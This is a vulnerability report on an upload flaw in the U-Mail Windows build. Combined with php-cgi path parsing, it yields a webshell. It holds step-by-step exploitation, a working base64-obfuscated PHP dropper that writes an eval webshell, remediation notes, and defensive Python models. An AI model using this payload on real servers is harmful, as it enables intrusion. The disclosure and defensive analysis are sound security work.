### Summary: A flaw in the Windows build of the U-Mail mail system lets an ordinary user get a shell

### Details:

Test environment: the latest Windows build downloaded from the vendor site, deployed on Windows Server 2003 + IIS 6.0. The mailbox was accessed with the current Chrome release. An ordinary (non-administrator) mailbox login is required.

Vulnerable file: `C:\umail\WorldClient\html\client\option\module\o_letterpaper.php`

Code (as recovered from the shipped build):

```php
if ( ACTION == "letterpaper-img-upload" ) {
    $targetFolder = getusercachepath( );
    $verifyToken = md5( "unique_salt".$_POST['timestamp'] );
    // "||": as soon as a file is present the token is never checked
    if ( !empty( $_FILES ) || $_POST['token'] == $verifyToken ) {
        $tempFile = $_FILES['Filedata']['tmp_name'];
        $targetPath = $targetFolder;
        // user-supplied name is kept verbatim, only prefixed
        $targetFile = rtrim( $targetPath, "/" )."/letterpaper_".$_FILES['Filedata']['name'];
        $fileTypes = array( "jpg", "jpeg", "gif", "png" );
        $fileParts = pathinfo( $_FILES['Filedata']['name'] );
        // the only filter: an extension allow-list
        if ( in_array( $fileParts['extension'], $fileTypes ) ) {
            $handle = opendir( $targetPath );
            while ( ( $file = readdir( $handle ) ) !== FALSE ) {
                if ( !( $file != "." ) && !( $file != ".." ) && strpos( $file, "letterpaper_" ) === FALSE ) {
                    $dir = rtrim( $targetPath, "/" ).DIRECTORY_SEPARATOR.$file;
                    unlink( $dir );
                }
            }
            closedir( $handle );
            // original bytes land under the web root at a URL-derivable path
            if ( move_uploaded_file( $tempFile, $targetFile ) ) {
                $thumbFile = rtrim( $targetPath, "/" )."/letterpaper_".$fileParts['filename']."_thumb.".$fileParts['extension'];
                $thumbUrl = rtrim( WEBMAIL_URL, "/" )."/cache/".$user_id."/letterpaper_".$fileParts['filename']."_thumb.".$fileParts['extension'];
                $targetUrl = rtrim( WEBMAIL_URL, "/" )."/cache/".$user_id."/letterpaper_".$_FILES['Filedata']['name'];
                // only the thumbnail is re-encoded; $targetFile is kept as uploaded
                if ( img2thumb( $targetFile, $thumbFile, $width = 100, $height = 100, $cut = 1, $proportion = 0 ) ) {
                    dump_json( array( "status" => 1, "file" => $targetFile, "fileUrl" => $targetUrl, "thumb" => $thumbFile, "thumbUrl" => $thumbUrl ) );
                } else {
                    unlink( $targetFile );
                    exit( );
                }
            }
        } else {
            dump_json( array( "status" => 0, "msg" => "Invalid file type." ) );
        }
    }
}
```

This is the image-upload handler for the letter-paper (stationery) feature. It admits only image extensions (jpg, jpeg, gif, png), and `img2thumb` must be able to decode the file or the upload is deleted again. Three properties of the code matter for the attack: the `||` in the condition means the `token` is never compared when a file is present (and the token is computable anyway, since the salt is a literal and `timestamp` comes from the same POST); the allow-list checks the extension only, never the content; and the original bytes are moved unchanged to `/cache/<user_id>/letterpaper_<name>` under the web root, with that URL handed back in the JSON response. Only the thumbnail is re-encoded.

Because this is the Windows build, the upload can be combined with the IIS 6.0 parsing bugs. Uploading `a.php;a.jpg` succeeds, but requesting it produces a script error (HTTP 500). PHP here runs as FastCGI (php-cgi), so the `v.jpg/a.php` parsing vector is used instead: with `cgi.fix_pathinfo=1` (the php.ini default) php-cgi walks a non-existent `SCRIPT_FILENAME` such as `.../letterpaper_v.jpg/a.php` back to the existing `letterpaper_v.jpg` and executes that file as PHP, regardless of its extension. The PHP version shipped with the default installer:

![PHP version shipped with the default installer](https://images.seebug.org/upload/201405/1618505037818a71917c121c3e782bf5e8f4ca52.png)

Exploitation steps

Prepare an image trojan. It must be a genuine image, with the following PHP embedded in it:

```php
<?php @fwrite(fopen(base64_decode('ZnVjay5waHA='),w), base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydmdWNrJ10pOz8+'));
```

Note: do not close the tag with `?>`; doing so causes an error. When executed, this writes a one-line webshell `fuck.php` into the current directory (the two base64 strings decode to `fuck.php` and `<?php @eval($_POST['fuck']);?>`). PHP echoes everything outside `<?php ... ?>` verbatim, which is why the surrounding image bytes do not stop the code from running.

The image trojan used here:

![ddd.jpg](https://images.seebug.org/upload/201405/161851365da85b5aaa472acf4075f022851fe663.jpg)

If the file is not a real image, the call `if ( img2thumb( $targetFile, $thumbFile, $width = 100, $height = 100, $cut = 1, $proportion = 0 ) )` fails and the response does not contain the uploaded path, as shown:

![Upload response without a file URL when the image does not decode](https://images.seebug.org/upload/201405/1618521634479267f85d9c167f8ec6ebf64b7d72.png)

Log in to the mailbox in Chrome and configure a proxy:

![Proxy configuration](https://images.seebug.org/upload/201405/16185256a2d2c24943561902f768f938b5b7881c.png)

Inspect the response:

![Upload response containing the file URL](https://images.seebug.org/upload/201405/161853348e42c5326241a26dc8ae3c9a656c592e.png)

The uploaded file is reported at `/webmail/client/cache/5/letterpaper_v.jpg`. Now browse to `/webmail/client/cache/5/letterpaper_v.jpg/a.php`:

![The JPEG executed as PHP via the path-info parsing bug](https://images.seebug.org/upload/201405/1618540971e3bd0b39ed67cce2f3f561c1296b57.png)

The vendor's own site does not expose the letter-paper feature, but the same request can be submitted from a local copy with the POST address changed to obtain a webshell; this was not tested in detail.

The vendor's site does exhibit the parsing vulnerability, as shown:

![Parsing vulnerability on the vendor's site](https://images.seebug.org/upload/201405/161854522fa128e8087eb14cd907e7d619959a21.png)

Remediation notes for operators of this setup: set `cgi.fix_pathinfo=0` in php.ini, and in IIS set Execute Permissions on the `/webmail/client/cache` directory to None so nothing under it is ever handed to php-cgi. In the handler itself, keep only re-encoded image output under a server-generated filename instead of `move_uploaded_file` of the original bytes, and require the token with `&&` rather than `||`.

### Proof of concept:
See the detailed description above.
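The request `/webmail/client/cache/5/letterpaper_v.jpg/a.php` succeeds because php-cgi with `cgi.fix_pathinfo=1` strips trailing path components from a non-existent `SCRIPT_FILENAME` until it reaches a real file, then executes that file as PHP without looking at its extension. The Python below is an added example, not U-Mail or PHP source: it models that lookup over a constructed set of web-root paths (the reported upload location plus a hypothetical `index.php` front controller) and shows the effect of two controls, `cgi.fix_pathinfo=0` and an executed-extension allow-list in the style of php-fpm's `security.limit_extensions`. `WEBROOT_FILES`, `php_cgi_executes` and the `limit_extensions` parameter are this demo's own assumptions; php-cgi.exe on Windows has no `limit_extensions` equivalent.

```python
"""Why /cache/5/letterpaper_v.jpg/a.php runs a JPEG as PHP under PHP-CGI.

Added example, not U-Mail code. It models php-cgi's cgi.fix_pathinfo=1 lookup
and two controls that stop it. All paths below are constructed for the demo.
"""
import posixpath
from typing import Container, Optional, Tuple

# Constructed web root: files that exist on the hypothetical server. The first
# mirrors the upload location reported above; the second stands in for a normal
# front controller that legitimately relies on PATH_INFO (e.g. /index.php/a/b).
WEBROOT_FILES = frozenset({
    "/webmail/client/cache/5/letterpaper_v.jpg",
    "/webmail/client/index.php",
})


def split_fix_pathinfo(request_path: str, files: Container[str]) -> Optional[Tuple[str, str]]:
    """cgi.fix_pathinfo=1: if the requested path is not a file, strip trailing
    components until an existing file is found. That file becomes
    SCRIPT_FILENAME and the stripped tail becomes PATH_INFO. The file's own
    extension is never consulted, which is the whole problem."""
    path = posixpath.normpath(request_path)
    path_info = ""
    while path not in ("/", ""):
        if path in files:
            return path, path_info
        path, tail = posixpath.split(path)
        path_info = "/" + tail + path_info
    return None


def php_cgi_executes(request_path: str, files: Container[str] = WEBROOT_FILES,
                     fix_pathinfo: bool = True,
                     limit_extensions: Tuple[str, ...] = ()) -> Optional[str]:
    """Return the file php-cgi would execute for a request, or None if refused.

    Simplified two-stage model: the web server hands the request to php-cgi
    whenever some URL segment ends in .php (as an IIS6 .php script map does),
    and php-cgi then resolves the script. `limit_extensions` models php-fpm's
    security.limit_extensions, which refuses a resolved script whose extension
    is not listed (php-cgi.exe on Windows has no such setting; there the
    equivalent is denying script execution on the cache directory in IIS).
    """
    if not any(seg.lower().endswith(".php") for seg in request_path.split("/")):
        return None                                  # static file, never parsed
    if fix_pathinfo:
        hit = split_fix_pathinfo(request_path, files)
    else:                                            # fix_pathinfo=0: exact match only
        norm = posixpath.normpath(request_path)
        hit = (norm, "") if norm in files else None  # else "No input file specified."
    if hit is None:
        return None
    script, _path_info = hit
    if limit_extensions and not script.lower().endswith(limit_extensions):
        return None                                  # php-fpm: "Access denied."
    return script


if __name__ == "__main__":
    url = "/webmail/client/cache/5/letterpaper_v.jpg/a.php"
    legit = "/webmail/client/index.php/inbox/list"
    print("default php.ini       ->", php_cgi_executes(url))
    print("fix_pathinfo=0        ->", php_cgi_executes(url, fix_pathinfo=False))
    print("limit_extensions=.php ->", php_cgi_executes(url, limit_extensions=(".php",)))
    print("legit PATH_INFO       ->", php_cgi_executes(legit))
    print("legit, fix_pathinfo=0 ->", php_cgi_executes(legit, fix_pathinfo=False))
```

The last two cases are the ones worth noticing: `cgi.fix_pathinfo=0` stops the JPEG from executing but also breaks ordinary `index.php/extra` routing, whereas an executed-extension allow-list stops the attack and keeps `PATH_INFO` working. On the IIS6 + php-cgi.exe setup in this report, where no such allow-list exists, the practical equivalent is removing script execution from the `/cache` directory so that no request under it reaches PHP at all.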
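The handler above keeps an upload only if `img2thumb` can decode it, so the PHP has to sit inside a file that is still a valid image. The Python below is an added example, not part of the original report: it builds a constructed 1x1 GIF with a harmless `<?php` marker in a comment extension, confirms the result still parses as a well-formed GIF, reports where the tag sits (comment, trailing bytes, or elsewhere), and strips the non-pixel blocks the way a re-encode would. GIF is used because its block structure parses in a few lines; JPEG `COM`/`APPn` segments and PNG text chunks offer the same hiding places. `MINIMAL_GIF`, `CONSTRUCTED_PAYLOAD`, `scan_gif` and `strip_to_pixels` are names of this example, not of U-Mail.

```python
"""Detect and strip PHP payloads hidden in GIFs that still decode as images.

Added example, not U-Mail code. The sample GIF and payload are constructed.
"""
import struct
from typing import Dict, List, Tuple

PHP_MARKERS = (b"<?php", b"<?=", b'<script language="php"')

# Constructed 1x1 two-colour GIF89a: header, logical screen descriptor, global
# colour table, graphic control extension, image descriptor, LZW data, trailer.
MINIMAL_GIF = (
    b"GIF89a" + b"\x01\x00\x01\x00\x80\x00\x00"      # 1x1, GCT flag set, 2 colours
    + b"\x00\x00\x00\xff\xff\xff"                    # GCT: black, white
    + b"\x21\xf9\x04\x01\x00\x00\x00\x00"            # graphic control extension
    + b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"    # image descriptor
    + b"\x02\x02\x44\x01\x00"                        # min code size + LZW sub-block
    + b"\x3b"                                        # trailer
)
# Constructed, harmless stand-in for the report's fwrite/eval payload.
CONSTRUCTED_PAYLOAD = b"<?php echo 'polyglot'; ?>"


def _sub_blocks(data: bytes, pos: int) -> int:
    """Skip GIF data sub-blocks (length byte + payload) up to the 0x00 terminator."""
    while True:
        n = data[pos]
        pos += 1
        if n == 0:
            return pos
        pos += n


def parse_gif(data: bytes) -> List[Tuple[str, bytes]]:
    """Split a GIF into contiguous typed segments; raise ValueError/IndexError if malformed."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    packed = data[10]
    pos = 13 + (3 * (2 << (packed & 0x07)) if packed & 0x80 else 0)   # skip GCT
    segs = [("header", data[:pos])]
    labels = {0xFE: "comment", 0xF9: "gce", 0xFF: "application", 0x01: "plaintext"}
    while True:
        start, tag = pos, data[pos]
        if tag == 0x3B:                                   # trailer
            segs.append(("trailer", data[pos:pos + 1]))
            if len(data) > pos + 1:                       # bytes after the trailer
                segs.append(("trailing", data[pos + 1:]))
            return segs
        if tag == 0x21:                                   # extension: label + sub-blocks
            pos = _sub_blocks(data, pos + 2)
            segs.append((labels.get(data[start + 1], "extension"), data[start:pos]))
        elif tag == 0x2C:                                 # image descriptor
            lpacked = data[pos + 9]
            pos += 10 + (3 * (2 << (lpacked & 0x07)) if lpacked & 0x80 else 0)
            pos = _sub_blocks(data, pos + 1)              # +1 skips LZW min code size
            segs.append(("image", data[start:pos]))
        else:
            raise ValueError("unknown block 0x%02x at %d" % (tag, start))


def scan_gif(data: bytes) -> Dict[str, object]:
    """Report whether the file parses as a GIF and where PHP open tags sit in it."""
    try:
        segs, well_formed = parse_gif(data), True
    except (ValueError, IndexError, struct.error):
        segs, well_formed = [("raw", data)], False
    hits, offset = [], 0
    for kind, raw in segs:
        for marker in PHP_MARKERS:
            i = raw.find(marker)
            while i != -1:
                hits.append((kind, offset + i))
                i = raw.find(marker, i + 1)
        offset += len(raw)
    return {"well_formed": well_formed, "php_hits": hits,
            "php_anywhere": any(m in data for m in PHP_MARKERS)}


def strip_to_pixels(data: bytes) -> bytes:
    """Keep only what a decoder needs (header, GCE, image, trailer). A tag hidden
    inside the LZW data would survive this; a full re-encode (decode to pixels,
    encode fresh, as GD does for the thumbnail) removes that as well."""
    keep = {"header", "gce", "image", "trailer"}
    return b"".join(raw for kind, raw in parse_gif(data) if kind in keep)


def gif_with_comment(payload: bytes, base: bytes = MINIMAL_GIF) -> bytes:
    """Build the polyglot: insert a comment extension carrying `payload` after the GCT."""
    header = parse_gif(base)[0][1]
    chunks = [payload[i:i + 255] for i in range(0, len(payload), 255)]
    ext = b"\x21\xfe" + b"".join(bytes([len(c)]) + c for c in chunks) + b"\x00"
    return header + ext + base[len(header):]
```

`scan_gif` searches the image segment as well, so a tag packed into LZW data is still reported even though `strip_to_pixels` would keep it. That asymmetry is the point for `o_letterpaper.php`: the code already produces a re-encoded thumbnail, but then returns the URL of the untouched original, so the durable fix is to serve only re-encoded output under a server-generated name and never `move_uploaded_file` the original bytes to a path the client can derive.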